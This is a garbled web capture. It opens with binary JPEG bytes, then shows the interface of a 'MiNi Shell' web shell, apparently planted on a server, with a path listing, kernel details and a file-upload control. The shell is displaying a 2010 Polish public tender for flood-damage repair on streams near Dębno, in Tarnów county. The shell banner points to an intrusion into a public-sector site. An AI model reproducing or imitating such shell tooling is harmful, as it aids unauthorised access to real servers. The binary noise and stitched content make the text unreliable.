JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101015/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101015/332562-N-2010.html

<p class="kh_header"><b>Tarnów: 1. Usuwanie szkód powodziowych na potoku Niedźwiedź w km 3+300-3+950 i 6+000-7+250 m. Wola Dębińska, Dębno gm. Dębno, pow. brzeski.
2. Usuwanie szkód powodziowych na potoku Kisielina w km 39+750-40+500  
m. Sufczyn, gm. Dębno, pow. brzeski.</b><br>
<b>Numer ogłoszenia: 332562 - 2010; data zamieszczenia: 15.10.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Małopolski Zarząd Melioracji i Urządzeń Wodnych w Krakowie Inspektorat Rejonowy w Tarnowie , ul. Ostrogskich 5, 33-100 Tarnów, woj. małopolskie, tel. 014 6376922, faks 014 6376913.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.mzmiuw.krakow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> 1. Usuwanie szkód powodziowych na potoku Niedźwiedź w km 3+300-3+950 i 6+000-7+250 m. Wola Dębińska, Dębno gm. Dębno, pow. brzeski.
2. Usuwanie szkód powodziowych na potoku Kisielina w km 39+750-40+500  
m. Sufczyn, gm. Dębno, pow. brzeski..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Usuwanie szkód powodziowych na potoku Niedźwiedź w km 3+300-3+950 i 6+000-7+250 m. Wola Dębińska, Dębno gm. Dębno, pow. brzeski:
Ręczne ścinanie i karczowanie krzaków i podszyć średniej gęstości. Odrąbanie drobnych gałęzi i ułożenie w stosy-0,6ha. Oczyszczenie terenu po wykarczowaniu z drobnych gałęzi, korzeni i kory (bez wrzosu), zgrabienie na stosy drobnych gałęzi z wywiezieniem poza teren obiektu na odległość do 2 km w miejsce wskazane przez inwestora i spalenie-3200m2. Ścinanie piłą mechaniczną drzew o różnych średnicach, obcięcie gałęzi, ułożenie w stosy-126szt. Transport gałęzi poza teren obiektu na odległość do 2 km w miejsce wskazane przez inwestora i spalenie-43,89mp. Ręczne usuwanie namułu grubości 0,20m na długości-306m. Ręczne usunięcie nawisów na skarpach potoku z ziemi bez roślinności. Przerzucenie urobku w wyrwy lub poza górną krawędź skarpy-1380m2. Uzupełnienie narzutu kamiennego luzem z brzegu, wyładunek mechaniczny-15m3. Naprawa istniejących ubezpieczeń z koszy siatkowo-kamiennych-63m3. Likwidacja zatorów w korycie potoku. Usunięcie naniesionych gałęzi, śmieci itp. (materiał zamulony)- wywiezienie zanieczyszczeń samochodami na odległość do 1km, złożenie na terenie działki gminnej z przeznaczeniem do wykorzystania przez Sołectwo Wsi Dębno-100,8m3. Mechaniczne karczowanie pni o różnych średnicach. Wydobycie pnia, zasypanie dołu-18szt. Transport karpiny poza teren obiektu na odległość do 2 km w miejsce wskazane przez inwestora i spalenie-6,14mp.
2. Usuwanie szkód powodziowych na potoku Kisielina w km 39+750-40+500  m. Sufczyn,  gm. Dębno, pow. brzeski :
Ręczne ścinanie i karczowanie krzaków i podszyć średniej gęstości. Odrąbanie drobnych gałęzi i ułożenie w stosy-0,375ha. Oczyszczenie terenu po wykarczowaniu z drobnych gałęzi, korzeni i kory (bez wrzosu), zgrabienie na stosy drobnych gałęzi z wywiezieniem poza teren obiektu na odległość do 2 km w miejsce
 wskazane przez inwestora i spalenie-5500m2. Ścinanie piłą mechaniczną drzew o różnych średnicach, obcięcie gałęzi, ułożenie w stosy-182szt. Transport gałęzi poza teren obiektu na odległość do 2 km w miejsce wskazane przez inwestora i spalenie-66,34mp. Ręczne usuwanie namułu grubości 0,20m na długości-750m. Ręczne usunięcie nawisów na skarpach potoku z ziemi bez roślinności. Przerzucenie urobku w wyrwy lub poza górną krawędź skarpy-750m2. Uzupełnienie narzutu kamiennego luzem z brzegu, wyładunek mechaniczny-27m3. Naprawa istniejących ubezpieczeń z koszy siatkowo-kamiennych-30m3. Likwidacja zatorów w korycie potoku. Usunięcie naniesionych gałęzi, śmieci itp. (materiał zamulony) - wywiezienie zanieczyszczeń samochodami na odległość do 1km, złożenie na terenie działki gminnej z przeznaczeniem do wykorzystania przez Sołectwo Wsi Sufczyn-35m3. Mechaniczne karczowanie pni o różnych średnicach. Wydobycie pnia, zasypanie dołu-29szt. Transport karpiny poza teren obiektu na odległość do 2 km w miejsce wskazane przez inwestora i spalenie-6,14mp..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.31.11.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium w wysokości : 
część 1 zamówienia - 1500zł 
część 2 zamówienia - 1700zł 
należy wnieść w terminie do dnia 25.10.2010 do godz. 9:30.
Wadium winno być wniesione w : 
1) pieniądzu; 
2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo- kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym; 
3) gwarancjach bankowych; 
4) gwarancjach ubezpieczeniowych; 
5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (tj. Dz. U. Nr 42, poz. 275 
z 2007 r.) Wadium wnoszone w pieniądzu należy przelać na rachunek KREDYT BANK PBI S.A. II O/KRAKÓW nr konta 70 1500 1487 1214 8003 1851 0000 w terminie do dnia 22.10.2010 r. 
Wadium w innej formie niż pieniądz należy złożyć w formie oryginału w siedzibie Zamawiającego w Tarnowie ul. Ostrogskich 5 sekretariat ( I piętro ). Dowód wpłaty wadium należy dołączyć do oferty.
1.2. Wadium wnoszone w formie gwarancji lub poręczeń musi spełniać następujące wymogi: 
- być wystawione na Małopolski Zarząd Melioracji i Urządzeń Wodnych w Krakowie 
-zawierać w swej treści oświadczenie gwaranta (poręczyciela), w którym zobowiązuje się on do bezwarunkowej wypłaty kwoty wadium na pierwsze żądanie Zamawiającego zawierające oświadczenie, że zaszła jedna z przesłanek wymienionych w art. 46 ust 4a i/lub 5 Ustawy. - w przypadku, gdy Wykonawcy wspólnie ubiegają się o udzielenie zamówienia - obejmować zobowiązania gwaranta (poręczyciela) z tytułów związanych z postępowaniem o udzielenie zamówienia działań lub zaniechań określonych w art. 46 ust.4a i /lub ust. 5 Ustawy każdego z tych wykonawców - okres ważności wadium nie może być krótszy niż okres związania ofertą..</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Przedłoży dokumenty potwierdzające status prawny Wykonawcy: aktualny odpis z właściwego rejestru lub aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej potwierdzający, że profil Wykonawcy odpowiada przedmiotowi zamówienia, wystawione nie wcześniej niż 6-mcy przed terminem składania ofert, jeżeli przepisy prawa nakładają taki obowiązek ich posiadania. Zamawiający dokona oceny spełniania warunków zgodnie z formułą spełnia - nie spełnia na podstawie informacji zawartych w dostarczonych dokumentach i oświadczeniach wymaganych</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże, że wykonał co najmniej 1 zamówienie  w okresie ostatnich 3 lat przed upływem terminu składania ofert o udzielenie zamówienia, a jeżeli okres działalności jest krótszy - w tym okresie, odpowiadającej swoim rodzajem i wartością usługi (wartość nie mniejsza niż 30 000 zł) stanowiącym przedmiot zamówienia odpowiadające swoim rodzajem. Za zamówienie odpowiadające swoim rodzajem Zamawiający uznaje usługi w zakresie usuwania szkód powodziowych na urządzeniach  melioracji wodnych.  Zamawiający dokona oceny spełniania warunków zgodnie z formułą spełnia - nie spełnia na podstawie informacji zawartych w dostarczonych dokumentach i oświadczeniach wymaganych w specyfikacji.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże, że dysponują lub będą dysponować sprzętem i urządzeniami niezbędnymi do wykonania zamówienia wraz z informacją o podstawie dysponowania tym sprzętem. Zamawiający dokona oceny spełniania warunków zgodnie z formułą spełnia - nie spełnia na podstawie informacji zawartych w dostarczonych dokumentach i oświadczeniach wymaganych w specyfikacji.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca potwierdzi, że dysponuje osobami posiadającymi kwalifikacje zawodowe, doświadczenie i wykształcenie konieczne do realizacji zamówienia oraz informacje o podstawie do dysponowania tymi osobami posiadającymi kwalifikacje oraz posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień. Zamawiający dokona oceny spełniania warunków zgodnie z formułą spełnia - nie spełnia na podstawie informacji zawartych w dostarczonych dokumentach i oświadczeniach wymaganych w specyfikacji.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże, ich obroty za ostatnie trzy lata obrotowe, a jeżeli okres prowadzenia działalności jest krótszy - za ten okres (na podstawie rachunku zysków i strat) w wysokości nie mniejszej niż 50 000 zł. 
(Wartości podane w dokumentach w walutach innych niż wskazane przez Zamawiajacego Wykonawca przeliczy według średniego kursu NBP na dzień zakończenia roku obrotowego).
Zamawiający dokona oceny spełniania warunków zgodnie z formułą spełnia - nie spełnia na podstawie informacji zawartych w dostarczonych dokumentach i oświadczeniach wymaganych w specyfikacji.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">oświadczenie na temat wielkości średniego rocznego zatrudnienia u wykonawcy usług lub robót budowlanych oraz liczebności personelu kierowniczego w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a w przypadku gdy okres prowadzenia działalności jest krótszy - w tym okresie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">sprawozdanie finansowe w całości, a jeżeli podlega ono badaniu przez biegłego rewidenta zgodnie z przepisami o rachunkowości również z opinią odpowiednio o badanym sprawozdaniu albo jego części, a w przypadku wykonawców niezobowiązanych do sporządzania sprawozdania finansowego inny dokument określający obroty oraz zobowiązania i należności - za okres nie dłuższy niż ostatnie 3 lata obrotowe</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>nie dotyczy</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>) Nie przewiduje się wzrostu cen przedstawionych w kosztorysie ofertowym, jak również możliwości zmian składników cenotwórczych podanych w ofercie bez względu na zaistniałą w międzyczasie sytuację za wyjątkiem stawki podatku VAT, którego zmiana następuje z mocy prawa. 
2) Zmiana terminu wykonania przedmiotu zamówienia będzie możliwa wyłącznie w przypadku:
-konieczności udzielenia zamówień dodatkowych w rozumieniu art. 67 ust. 1 pkt. 5 ustawy pzp, których wykonanie rzutuje na termin wykonania zamówienia podstawowego .
-zdarzeń losowych tj. podtopienia placu budowy spowodowanego powodzią lub intensywnymi opadami deszczu tylko jeśli uniemożliwia to prowadzenie robót.
-zmiany harmonogramu rzeczowo - finansowego w sytuacji wystąpienia okoliczności niezależnych od Wykonawcy i udokumentowanych w formie pisemnej a mających wpływ na harmonogram.
3) dopuszcza się zmiany treści umowy zawartej z Wykonawcą w następujących przypadkach:
- zmiany kluczowego personelu wykonawcy, zamawiajacego lub podwykonawcy w wypadku wystąpienia okoliczności uniemożliwiających dalsze pełnienie tych funkcji;
- zmiany adresu Wykonawcy, Zamawiającego lub podwykonawcy;
- zmiany w KRS lub wpisie do ewidencji działalności gospodarczej w trakcie realizacji zamówienia;
- zmiany kont bankowych, 
- wystąpienie oczywistych omyłek pisarskich i rachunkowych w treści umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.mzmiuw.krakow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Inspektoracie Rejonowym w Tarnowie, 33-100 Tarnów, ul. Ostrogskich 5, pok. nr 14.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.10.2010 godzina 09:30, miejsce: Inspektoracie Rejonowym w Tarnowie, 33-100 Tarnów, ul. Ostrogskich 5, pok. nr 9.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Usuwanie szkód powodziowych na potoku Niedźwiedź w km 3+300-3+950 i 6+000-7+250 
m. Wola Dębińska, Dębno gm. Dębno, pow. brzeski.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ręczne ścinanie i karczowanie krzaków i podszyć średniej gęstości. Odrąbanie drobnych gałęzi i ułożenie w stosy-0,6ha. Oczyszczenie terenu po wykarczowaniu z drobnych gałęzi, korzeni i kory (bez wrzosu), zgrabienie na stosy drobnych gałęzi z wywiezieniem poza teren obiektu na odległość do 2 km w miejsce wskazane przez inwestora i spalenie-3200m2. Ścinanie piłą mechaniczną drzew o różnych średnicach, obcięcie gałęzi, ułożenie w stosy-126szt. Transport gałęzi poza teren obiektu na odległość do 2 km w miejsce wskazane przez inwestora i spalenie-43,89mp. Ręczne usuwanie namułu grubości 0,20m na długości-306m. Ręczne usunięcie nawisów na skarpach potoku z ziemi bez roślinności. Przerzucenie urobku w wyrwy lub poza górną krawędź skarpy-1380m2. Uzupełnienie narzutu kamiennego luzem z brzegu, wyładunek mechaniczny-15m3. Naprawa istniejących 